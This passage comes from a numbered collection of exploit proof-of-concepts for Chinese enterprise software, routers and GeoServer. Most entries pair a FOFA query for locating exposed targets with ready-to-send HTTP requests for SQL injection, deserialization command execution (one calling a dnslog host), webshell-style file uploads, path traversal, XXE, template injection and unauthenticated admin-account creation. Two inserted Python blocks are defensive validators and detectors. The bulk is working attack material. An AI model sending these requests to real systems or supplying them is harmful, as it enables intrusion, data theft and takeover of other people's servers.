Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Then access:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver (泛微) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech (迪普) VPN Service arbitrary file upload (the PoC given is a directory-traversal read of /etc/passwd)
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

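Added example for the upload entries 24, 28, 35, 42, 48 and 49 and the traversal reads in 47 and 53 (Python, hypothetical handler code written for this list; it is not code from any of the products named). The uploads above succeed because the server trusts a client-supplied name or path (the multipart filename, the fname field in entry 24, the fileType=jsp parameter in entry 28) and the downloads because fileName is joined to a base directory without containment. The two functions below show the checks a handler needs; ALLOWED_EXT, the base directory and the sample names are assumptions made for the example.

```python
import os
import posixpath
import secrets
import urllib.parse

# Extensions the hypothetical handler accepts; everything else is refused.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}


class RejectedUpload(ValueError):
    pass


class PathEscape(ValueError):
    pass


def safe_upload_name(client_filename: str) -> str:
    """Return a server-chosen storage name, or raise RejectedUpload.

    Only the extension of the client name is consulted; the name itself never
    reaches the filesystem, so "\\webapps\\nc_web\\x.jsp" or "./webapps/nc_web/1.jsp"
    cannot steer the write. Trailing spaces and dots are stripped first because
    Windows drops them when creating the file ("s.php " is stored as "s.php").
    """
    name = client_filename.replace("\\", "/").split("/")[-1].rstrip(" .")
    if not name or name.startswith("."):
        raise RejectedUpload("empty or dot-file name")
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_EXT:
        raise RejectedUpload(f"extension {ext or '(none)'} not allowed")
    # Random name: a double extension such as "x.jsp.pdf" stays harmless because
    # nothing of the client name but the vetted extension survives.
    return secrets.token_hex(16) + ext


def resolve_download(base_dir: str, requested: str) -> str:
    """Map a user-supplied fileName onto base_dir; raise PathEscape if it leaves it.

    Percent-decoding is repeated until stable so ..%2F.. and %252e%252e are both
    seen as traversal, backslashes count as separators, and containment is checked
    on the normalised path rather than by searching for a literal "..". This is
    pure string logic (posixpath); symlinks inside base_dir are out of scope.
    """
    decoded = requested
    for _ in range(3):
        nxt = urllib.parse.unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = decoded.replace("\\", "/")
    if decoded.startswith("/") or "\x00" in decoded:
        raise PathEscape(requested)
    base = posixpath.normpath(base_dir)
    full = posixpath.normpath(posixpath.join(base, decoded))
    if not full.startswith(base + "/"):
        raise PathEscape(requested)
    return full


def upload_allowed(client_filename: str) -> bool:
    try:
        safe_upload_name(client_filename)
        return True
    except RejectedUpload:
        return False


def download_allowed(base_dir: str, requested: str) -> bool:
    try:
        resolve_download(base_dir, requested)
        return True
    except PathEscape:
        return False


if __name__ == "__main__":
    # Constructed inputs shaped like the PoC names above.
    for fn in ["\\webapps\\nc_web\\x.jsp", "./webapps/nc_web/1.jsp", "%s.php ", "report.pdf"]:
        print(f"upload   {fn!r:32} -> {upload_allowed(fn)}")
    for req in ["../../../etc/passwd", "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
                "reports/2024.pdf"]:
        print(f"download {req!r:50} -> {download_allowed('/srv/app/files', req)}")
```

The point of the upload side is that there is no filename to sanitise: the server picks the name, and any client-controlled destination parameter (entry 24's fname, entry 28's fileType) is simply not read.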
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface
Step 2: with that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}
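
Added example for entries 22, 23, 25, 54 and 56 (Python; not code from the original post or from Dahua, Yonyou or Chanjet): triage of a JSON request body for the three shapes those entries share, a log4j ${jndi:...} lookup, a fastjson "@type" autoType discriminator, and the .NET "__type" ObjectDataProvider chain that the Ajaxpro handler deserializes. The lookup normaliser goes beyond the plain ${jndi:ldap://...} string above and also folds the nested ${lower:j} / ${::-n} / ${env:X:-j} obfuscations log4j itself evaluates. The sample bodies are constructed and example.invalid is a placeholder host.

```python
import json
import re

# fastjson and .NET JavaScriptSerializer/Ajaxpro type discriminators.
_TYPE_KEYS = {"@type", "__type"}

# log4j lookup obfuscation: ${lower:j}, ${upper:N}, ${env:X:-j}, ${::-d}. Inner
# lookups are replaced by the literal text they evaluate to until nothing changes,
# then the jndi: prefix is searched for. The character classes exclude $ { } so a
# match never spans a nested lookup.
_CASE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookup(s: str) -> str:
    """Collapse nested log4j lookups to the literal text they would produce."""
    prev = None
    while prev != s:
        prev = s
        s = _CASE.sub(lambda m: m.group(1), s)
        s = _DEFAULT.sub(lambda m: m.group(1), s)
    return s


def _walk(node, path="$"):
    """Yield a finding for every type discriminator or jndi lookup in a decoded JSON tree."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key in _TYPE_KEYS and isinstance(value, str):
                # "System.Diagnostics.Process, System, Version=..." -> type name only
                yield "type:" + value.split(",")[0].strip()
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}[{i}]")
    elif isinstance(node, str) and _JNDI.search(normalize_lookup(node)):
        yield f"jndi:{path}"


def scan_body(raw: str) -> set:
    """Finding labels for one JSON request body; an empty set means nothing was seen."""
    try:
        return set(_walk(json.loads(raw)))
    except ValueError:
        pass
    # Not valid JSON. The fastjson DNS probe is deliberately malformed (an object
    # where a key belongs), so fall back to scanning the text itself.
    findings = {"malformed-json"}
    if _JNDI.search(normalize_lookup(raw)):
        findings.add("jndi:raw")
    for key in _TYPE_KEYS:
        if f'"{key}"' in raw:
            findings.add(f"type-key:{key}")
    return findings


# Constructed bodies shaped like the requests in entries 22, 23 and 56.
SAMPLES = {
    "dahua_log4j": '{"loginName":"${jndi:ldap://example.invalid/a}"}',
    "dahua_log4j_obf": '{"loginName":"${${lower:j}${::-n}di:${lower:ldap}://example.invalid/a}"}',
    "dahua_fastjson": '{"a":{"@type":"com.alibaba.fastjson.JSONObject",'
                      '{"@type":"java.net.URL","val":"http://example.invalid"}}""}',
    "tplus_odp": json.dumps({"storeID": {
        "__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, "
                  "Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
        "MethodName": "Start",
        "ObjectInstance": {
            "__type": "System.Diagnostics.Process, System, Version=4.0.0.0, "
                      "Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo": {
                "__type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, "
                          "Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName": "cmd", "Arguments": "/c whoami"}}}}),
    "benign": '{"storeID": 42, "loginName": "alice"}',
}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:16s} {sorted(scan_body(body))}")
```

A WAF or body-logging proxy is the right place for this; the discriminator keys are the part worth alerting on, because a legitimate client of these endpoints never sends "@type" or "__type" at all.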

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA: app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Baizhuo (百卓) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Ente (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate (优卡特) Lian'ai Cloud face-recognition all-in-one smart management platform 1.0.55.0.0.1 privilege bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) Palm Campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

Then request:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then request:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) bandwidth-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then request:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

